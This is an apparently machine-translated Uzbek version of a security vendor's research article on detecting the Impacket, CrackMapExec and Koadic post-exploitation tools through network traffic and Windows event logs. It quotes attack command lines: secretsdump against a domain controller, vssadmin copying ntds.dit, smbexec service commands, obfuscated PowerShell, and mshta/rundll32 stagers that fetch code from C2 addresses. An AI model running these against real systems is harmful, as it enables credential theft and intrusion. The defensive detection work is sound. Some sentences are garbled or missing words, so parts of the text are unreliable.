Korporativ sektorda hujumlar soni har yili ortib bormoqda: masalan 2016 yilga nisbatan va 2018 yil oxirida - oldingi davrga nisbatan. Jumladan, asosiy ish vositasi Windows operatsion tizimi bo'lganlar. 2017-2018 yillarda APT Dragonfly, APT28, Yevropa, Shimoliy Amerika va Saudiya Arabistonidagi hukumat va harbiy tashkilotlarga hujumlar uyushtirgan. Buning uchun biz uchta vositadan foydalandik - , и . Ularning manba kodi ochiq va GitHub-da mavjud.
Ta'kidlash joizki, ushbu vositalar dastlabki kirish uchun emas, balki infratuzilma ichidagi hujumni rivojlantirish uchun ishlatiladi. Hujumchilar ularni perimetrga kirib borganidan keyin hujumning turli bosqichlarida ishlatadilar. Aytgancha, buni aniqlash qiyin va ko'pincha faqat texnologiya yordamida yoki ruxsat beruvchi vositalar . Asboblar fayllarni uzatishdan tortib ro'yxatga olish kitobi bilan o'zaro ishlash va masofaviy kompyuterda buyruqlarni bajarishgacha bo'lgan turli funktsiyalarni ta'minlaydi. Biz ushbu vositalarning tarmoq faolligini aniqlash uchun tadqiqot o'tkazdik.
Biz nima qilishimiz kerak edi:
- Xakerlik vositalari qanday ishlashini tushuning. Buzg'unchilar qanday ekspluatatsiya qilishlari kerakligini va ular qanday texnologiyalardan foydalanishlari mumkinligini bilib oling.
- Hujumning birinchi bosqichlarida axborot xavfsizligi vositalari tomonidan aniqlanmagan narsalarni toping. Razvedka bosqichi o'tkazib yuborilishi mumkin, chunki tajovuzkor ichki tajovuzkor bo'lganligi sababli yoki tajovuzkor infratuzilmadagi ilgari ma'lum bo'lmagan teshikdan foydalanmoqda. Uning harakatlarining butun zanjirini tiklash mumkin bo'ladi, shuning uchun keyingi harakatni aniqlash istagi.
- Intrusionni aniqlash vositalaridan noto'g'ri pozitivlarni yo'q qiling. Shuni unutmasligimiz kerakki, faqat razvedka asosida ma'lum harakatlar aniqlanganda, tez-tez xatolar bo'lishi mumkin. Odatda infratuzilmada har qanday ma'lumotni olish uchun birinchi qarashda qonuniylardan farq qilmaydigan etarli miqdordagi usullar mavjud.
Ushbu vositalar hujumchilarga nima beradi? Agar bu Impacket bo'lsa, tajovuzkorlar perimetrni buzgandan keyin hujumning turli bosqichlarida ishlatilishi mumkin bo'lgan katta modul kutubxonasini oladi. Ko'pgina vositalar Impacket modullaridan ichki foydalanadi - masalan, Metasploit. Unda masofaviy buyruqlarni bajarish uchun dcomexec va wmiexec, Impacket-dan qo'shilgan xotiradan hisoblarni olish uchun secretsdump mavjud. Natijada, bunday kutubxona faoliyatini to'g'ri aniqlash, hosilalarni aniqlashni ta'minlaydi.
Yaratuvchilar CrackMapExec (yoki oddiygina CME) haqida "Powered by Impacket" ni yozishlari bejiz emas. Bundan tashqari, CME mashhur stsenariylar uchun tayyor funksionallikka ega: parollar yoki ularning xeshlarini olish uchun Mimikatz, masofaviy bajarish uchun Meterpreter yoki Empire agentini amalga oshirish va bortda Bloodhound.
Biz tanlagan uchinchi vosita Koadic edi. Bu juda yaqinda, u 25 yilda DEFCON 2017 xalqaro xakerlik anjumanida taqdim etilgan va nostandart yondashuvi bilan ajralib turadi: u HTTP, Java Script va Microsoft Visual Basic Script (VBS) orqali ishlaydi. Ushbu yondashuv yerdan tashqarida yashash deb ataladi: vosita Windows-ga o'rnatilgan bog'liqliklar va kutubxonalar to'plamidan foydalanadi. Yaratuvchilar uni COM Command & Control yoki C3 deb atashadi.
IMPACKET
Impacket funksiyasi juda keng boʻlib, AD ichidagi razvedka va ichki MS SQL serverlaridan maʼlumotlarni yigʻishdan tortib, hisob maʼlumotlarini olish usullarigacha: bu SMB relay hujumi va domen boshqaruvchisidan foydalanuvchi parollari xeshlarini oʻz ichiga olgan ntds.dit faylini olish. Impacket shuningdek, to'rt xil usul yordamida buyruqlarni masofadan turib bajaradi: WMI, Windows Scheduler Management Service, DCOM va SMB va buning uchun hisob ma'lumotlarini talab qiladi.
Secretsdump
Keling, secretsdumpni ko'rib chiqaylik. Bu foydalanuvchi mashinalari va domen kontrollerlariga mo'ljallangan moduldir. U LSA, SAM, SECURITY, NTDS.dit xotira maydonlarining nusxalarini olish uchun ishlatilishi mumkin, shuning uchun uni hujumning turli bosqichlarida ko'rish mumkin. Modulning ishlashidagi birinchi qadam SMB orqali autentifikatsiya bo'lib, u Pass the Hash hujumini avtomatik ravishda amalga oshirish uchun foydalanuvchi parolini yoki uning xeshini talab qiladi. Keyin xizmatni boshqarish menejeriga (SCM) kirishni ochish va winreg protokoli orqali ro'yxatga olish kitobiga kirish so'rovi keladi, buning yordamida tajovuzkor qiziqqan filiallarning ma'lumotlarini bilib oladi va SMB orqali natijalarni oladi.
Shaklda. 1-rasmda biz winreg protokolidan foydalanganda LSA bilan ro'yxatga olish kitobi kaliti yordamida qanday qilib kirishni aniq ko'ramiz. Buning uchun opcode 15 - OpenKey bilan DCERPC buyrug'idan foydalaning.
Guruch. 1. Winreg protokoli yordamida ro'yxatga olish kitobi kalitini ochish
Keyinchalik, kalitga kirishga erishilganda, qiymatlar SaveKey buyrug'i bilan opcode 20 bilan saqlanadi. Impacket buni juda aniq tarzda amalga oshiradi. U qiymatlarni nomi .tmp bilan qo'shilgan 8 tasodifiy belgidan iborat bo'lgan faylga saqlaydi. Bundan tashqari, ushbu faylni keyingi yuklash System32 katalogidan SMB orqali amalga oshiriladi (2-rasm).
Guruch. 2. Masofaviy mashinadan registr kalitini olish sxemasi
Ma'lum bo'lishicha, tarmoqdagi bunday faollikni winreg protokoli, aniq nomlar, buyruqlar va ularning tartibidan foydalangan holda ba'zi ro'yxatga olish bo'limlariga so'rovlar orqali aniqlash mumkin.
Ushbu modul, shuningdek, Windows hodisalari jurnalida izlarni qoldiradi, bu uni aniqlashni osonlashtiradi. Masalan, buyruqni bajarish natijasida
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCWindows Server 2016 jurnalida biz voqealarning quyidagi asosiy ketma-ketligini ko'ramiz:
1. 4624 - masofaviy tizimga kirish.
2. 5145 - winreg masofaviy xizmatiga kirish huquqlarini tekshirish.
3. 5145 - System32 katalogidagi fayllarga kirish huquqlarini tekshirish. Fayl yuqorida aytib o'tilgan tasodifiy nomga ega.
4. 4688 - vssadmin-ni ishga tushiradigan cmd.exe jarayonini yaratish:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - buyruq bilan jarayon yaratish:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - buyruq bilan jarayon yaratish:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - buyruq bilan jarayon yaratish:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Ko'pgina ekspluatatsiyadan keyingi vositalar singari, Impacket-da buyruqlarni masofadan bajarish uchun modullar mavjud. Biz masofaviy kompyuterda interaktiv buyruqlar qobig'ini ta'minlovchi smbexec-ga e'tibor qaratamiz. Ushbu modul, shuningdek, parol yoki parol xesh yordamida SMB orqali autentifikatsiyani talab qiladi. Shaklda. 3-rasmda biz bunday vositaning qanday ishlashiga misolni ko'ramiz, bu holda bu mahalliy administrator konsolidir.
Guruch. 3. Interaktiv smbexec konsoli
Autentifikatsiyadan so'ng smbexecning birinchi qadami OpenSCManagerW buyrug'i (15) bilan SCMni ochishdir. So'rov diqqatga sazovor: MachineName maydoni DUMMY.
Guruch. 4. Xizmatni boshqarish menejerini ochishni so'rang
Keyinchalik, xizmat CreateServiceW buyrug'i (12) yordamida yaratiladi. Smbexec holatida biz har safar bir xil buyruqni qurish mantiqini ko'rishimiz mumkin. Shaklda. 5 yashil o'zgarmas buyruq parametrlarini bildiradi, sariq tajovuzkor nimani o'zgartirishi mumkinligini bildiradi. Ko'rinib turibdiki, bajariladigan fayl nomi, uning katalogi va chiqish fayli o'zgartirilishi mumkin, ammo qolganlarini Impacket moduli mantiqini buzmasdan o'zgartirish ancha qiyin.
Guruch. 5. Xizmatni boshqarish menejeri yordamida xizmat yaratishni so'rash
Smbexec Windows voqealar jurnalida ham aniq izlarni qoldiradi. IPconfig buyrug'i bilan interaktiv buyruqlar qobig'i uchun Windows Server 2016 jurnalida biz voqealarning quyidagi asosiy ketma-ketligini ko'ramiz:
1. 4697 - xizmatni jabrlanuvchining mashinasiga o'rnatish:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - 1-banddagi argumentlar bilan cmd.exe jarayonini yaratish.
3. 5145 - C$ katalogidagi __output fayliga kirish huquqlarini tekshirish.
4. 4697 — xizmatni jabrlanuvchining mashinasiga o‘rnatish.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - 4-banddagi argumentlar bilan cmd.exe jarayonini yaratish.
6. 5145 - C$ katalogidagi __output fayliga kirish huquqlarini tekshirish.
Impacket hujum vositalarini ishlab chiqish uchun asosdir. U Windows infratuzilmasidagi deyarli barcha protokollarni qo'llab-quvvatlaydi va ayni paytda o'ziga xos xususiyatlarga ega. Bu erda maxsus winreg so'rovlari va SCM API-dan foydalanish xarakterli buyruqlar shakllanishi, fayl nomi formati va SMB SYSTEM32 ulushi.
CRACKMAPEXEC
CME vositasi birinchi navbatda tajovuzkor tarmoq ichida oldinga siljish uchun bajarishi kerak bo'lgan muntazam harakatlarni avtomatlashtirish uchun mo'ljallangan. Bu sizga taniqli Empire agenti va Meterpreter bilan hamkorlikda ishlash imkonini beradi. Buyruqlarni yashirincha bajarish uchun CME ularni xiralashtirishi mumkin. Bloodhound (alohida razvedka vositasi) yordamida tajovuzkor faol domen ma'muri seansini qidirishni avtomatlashtirishi mumkin.
Bloodhound
Bloodhound, mustaqil vosita sifatida, tarmoq ichida ilg'or razvedka qilish imkonini beradi. U foydalanuvchilar, mashinalar, guruhlar, seanslar haqidagi ma'lumotlarni to'playdi va PowerShell skripti yoki ikkilik fayl sifatida taqdim etiladi. Ma'lumot to'plash uchun LDAP yoki SMB-ga asoslangan protokollar qo'llaniladi. CME integratsiya moduli Bloodhound-ni jabrlanuvchining mashinasiga yuklab olish, ishga tushirilgandan so'ng to'plangan ma'lumotlarni olish va shu bilan tizimdagi harakatlarni avtomatlashtirish va ularni kamroq sezish imkonini beradi. Bloodhound grafik qobig'i to'plangan ma'lumotlarni grafiklar ko'rinishida taqdim etadi, bu sizga tajovuzkorning mashinasidan domen ma'murigacha bo'lgan eng qisqa yo'lni topishga imkon beradi.
Guruch. 6. Bloodhound interfeysi
Jabrlanuvchining mashinasida ishlash uchun modul ATSVC va SMB yordamida vazifa yaratadi. ATSVC - bu Windows Task Scheduler bilan ishlash uchun interfeys. CME tarmoq orqali vazifalar yaratish uchun NetrJobAdd(1) funksiyasidan foydalanadi. CME moduli yuborgan narsaga misol rasmda ko'rsatilgan. 7: Bu cmd.exe buyruq chaqiruvi va XML formatidagi argumentlar ko'rinishidagi tushunarsiz kod.
7-rasm. CME orqali vazifa yaratish
Vazifani bajarish uchun topshirilgandan so'ng, jabrlanuvchining mashinasi Bloodhound-ni o'zi ishga tushiradi va buni tirbandlikda ko'rish mumkin. Modul standart guruhlarni, domendagi barcha mashinalar va foydalanuvchilar ro'yxatini olish va SRVSVC NetSessEnum so'rovi orqali faol foydalanuvchi seanslari haqida ma'lumot olish uchun LDAP so'rovlari bilan tavsiflanadi.
Guruch. 8. SMB orqali faol seanslar ro'yxatini olish
Bundan tashqari, Bloodhound-ni jabrlanuvchining mashinasida audit yoqilgan holda ishga tushirish ID 4688 (jarayon yaratish) va jarayon nomiga ega voqea bilan birga keladi. «C:WindowsSystem32cmd.exe». Bunda diqqatga sazovor narsa buyruq qatori argumentlari:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Enum_avproducts moduli funksionallik va amalga oshirish nuqtai nazaridan juda qiziq. WMI sizga turli xil Windows ob'yektlaridan ma'lumotlarni olish uchun WQL so'rovlar tilidan foydalanish imkonini beradi, bu asosan ushbu CME modulidan foydalanadi. U AntiSpywareProduct va AntiMirusProduct sinflariga jabrlanuvchining mashinasida o'rnatilgan himoya vositalari haqida so'rovlar hosil qiladi. Kerakli ma'lumotlarni olish uchun modul rootSecurityCenter2 nom maydoniga ulanadi, so'ngra WQL so'rovini yaratadi va javob oladi. Shaklda. 9-rasmda bunday so'rovlar va javoblarning mazmuni ko'rsatilgan. Bizning misolimizda Windows Defender topildi.
Guruch. 9. enum_avproducts modulining tarmoq faoliyati
Ko'pincha, WQL so'rovlari haqida foydali ma'lumotlarni topishingiz mumkin bo'lgan WMI auditi (Trace WMI-Activity) o'chirib qo'yilishi mumkin. Agar u yoqilgan bo'lsa, u holda enum_avproducts skripti ishga tushirilsa, ID 11 bo'lgan voqea saqlanadi.Unda so'rov yuborgan foydalanuvchi nomi va rootSecurityCenter2 nom maydonidagi ism bo'ladi.
CME modullarining har biri o'ziga xos artefaktlarga ega edi, xoh u o'ziga xos WQL so'rovlari yoki LDAP va SMB-da chalkashlik va Bloodhound-ga xos faoliyat bilan vazifalarni rejalashtiruvchida ma'lum turdagi vazifalarni yaratish.
KOADIC
Koadic-ning o'ziga xos xususiyati Windows-ga o'rnatilgan JavaScript va VBScript tarjimonlaridan foydalanishdir. Shu ma'noda, u yer yo'nalishi bo'yicha yashashni kuzatib boradi - ya'ni u tashqi bog'liqlikka ega emas va standart Windows vositalaridan foydalanadi. Bu to'liq Command & Control (CnC) uchun vositadir, chunki infektsiyadan keyin mashinaga "implant" o'rnatilgan bo'lib, uni boshqarishga imkon beradi. Koadik terminologiyasida bunday mashina "zombi" deb ataladi. Agar jabrlanuvchining to'liq ishlashi uchun imtiyozlar etarli bo'lmasa, Koadic foydalanuvchi hisobini boshqarishni chetlab o'tish (UAC bypass) usullaridan foydalangan holda ularni oshirish imkoniyatiga ega.
Guruch. 10. Koadik qobiq
Jabrlanuvchi buyruq va boshqaruv serveri bilan aloqani boshlashi kerak. Buning uchun u oldindan tayyorlangan URI bilan bog'lanishi va statorlardan biri yordamida asosiy Koadic tanasini olishi kerak. Shaklda. 11-rasmda mshta stendiga misol keltirilgan.
Guruch. 11. CnC server bilan seansni ishga tushirish
WS javob o'zgaruvchisiga asoslanib, bajarilish WScript.Shell orqali amalga oshishi aniq bo'ladi va STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE o'zgaruvchilari joriy sessiya parametrlari haqida asosiy ma'lumotlarni o'z ichiga oladi. Bu CnC serveri bilan HTTP ulanishidagi birinchi so'rov-javob juftligi. Keyingi so'rovlar chaqirilgan modullarning (implantlarning) funksionalligi bilan bevosita bog'liq. Barcha Koadic modullari faqat CnC bilan faol seans bilan ishlaydi.
Mimikats
CME Bloodhound bilan ishlagani kabi, Koadic ham Mimikatz bilan alohida dastur sifatida ishlaydi va uni ishga tushirishning bir necha usullariga ega. Quyida Mimikatz implantini yuklab olish uchun so'rov-javob juftligi keltirilgan.
Guruch. 12. Mimikatzni Koadichga o'tkazing
So'rovdagi URI formati qanday o'zgarganini ko'rishingiz mumkin. Endi u tanlangan modul uchun mas'ul bo'lgan csrf o'zgaruvchisi uchun qiymatni o'z ichiga oladi. Uning ismiga e'tibor bermang; Biz hammamiz bilamizki, CSRF odatda boshqacha tushuniladi. Javob Mimikatz bilan bog'liq kod qo'shilgan Koadicning bir xil asosiy qismi edi. Bu juda katta, shuning uchun asosiy fikrlarni ko'rib chiqaylik. Bu yerda bizda base64-da kodlangan Mimikatz kutubxonasi, uni in'ektsiya qiladigan seriyali .NET klassi va Mimikatzni ishga tushirish uchun argumentlar mavjud. Bajarish natijasi tarmoq orqali aniq matn shaklida uzatiladi.
Guruch. 13. Mimikatzni masofaviy mashinada ishga tushirish natijasi
Exec_cmd
Koadicda buyruqlarni masofadan turib bajara oladigan modullar ham mavjud. Bu erda biz bir xil URI yaratish usulini va tanish sid va csrf o'zgaruvchilarini ko'ramiz. exec_cmd moduli bo'lsa, qobiq buyruqlarini bajarishga qodir bo'lgan tanaga kod qo'shiladi. Quyida CnC serverining HTTP javobida mavjud kod ko'rsatilgan.
Guruch. 14. Implant kodi exec_cmd
Kodni bajarish uchun tanish WS atributiga ega GAWTUUGCFI o'zgaruvchisi talab qilinadi. Uning yordami bilan implant qobiqni chaqiradi, kodning ikkita tarmog'ini qayta ishlaydi - chiqish ma'lumotlar oqimini qaytarish bilan shell.exec va qaytmasdan shell.run.
Koadic odatiy vosita emas, lekin uning o'ziga xos artefaktlari bor, ular yordamida uni qonuniy trafikda topish mumkin:
- HTTP so'rovlarining maxsus shakllanishi,
- winHttpRequests API yordamida,
- ActiveXObject orqali WScript.Shell ob'ektini yaratish,
- katta bajariladigan korpus.
Dastlabki ulanish stend tomonidan boshlanadi, shuning uchun uning faolligini Windows hodisalari orqali aniqlash mumkin. Mshta uchun bu start atributi bilan jarayon yaratilishini ko'rsatadigan 4688-hodisa:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Koadic ishlayotganda, siz uni mukammal tavsiflovchi atributlarga ega bo'lgan boshqa 4688 hodisalarni ko'rishingiz mumkin:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1topilmalar
Erdan yashash tendentsiyasi jinoyatchilar orasida mashhurlikka erishmoqda. Ular o'z ehtiyojlari uchun Windows-ga o'rnatilgan vositalar va mexanizmlardan foydalanadilar. Ushbu tamoyilga amal qilgan mashhur Koadic, CrackMapExec va Impacket vositalari APT hisobotlarida tobora ko'proq paydo bo'layotganini ko'rmoqdamiz. GitHub-da ushbu vositalar uchun vilkalar soni ham ortib bormoqda va yangilari paydo bo'lmoqda (hozir ular mingga yaqin). Ushbu tendentsiya soddaligi tufayli mashhur bo'lib bormoqda: tajovuzkorlarga uchinchi tomon vositalari kerak emas, ular allaqachon qurbonlarning mashinalarida bo'lib, ularga xavfsizlik choralarini chetlab o'tishga yordam beradi. Biz tarmoq aloqasini o'rganishga e'tibor qaratamiz: yuqorida tavsiflangan har bir vosita tarmoq trafigida o'z izlarini qoldiradi; ularni batafsil o'rganish bizga mahsulotimizni o'rgatish imkonini berdi ularni aniqlash, bu oxir-oqibat ular bilan bog'liq kiber hodisalarning butun zanjirini tekshirishga yordam beradi.
mualliflar:
- Anton Tyurin, Positive Technologies PT Expert Security Center ekspert xizmatlari bo'limi boshlig'i
- Egor Podmokov, PT Expert Security Center, Positive Technologies eksperti
Manba: www.habr.com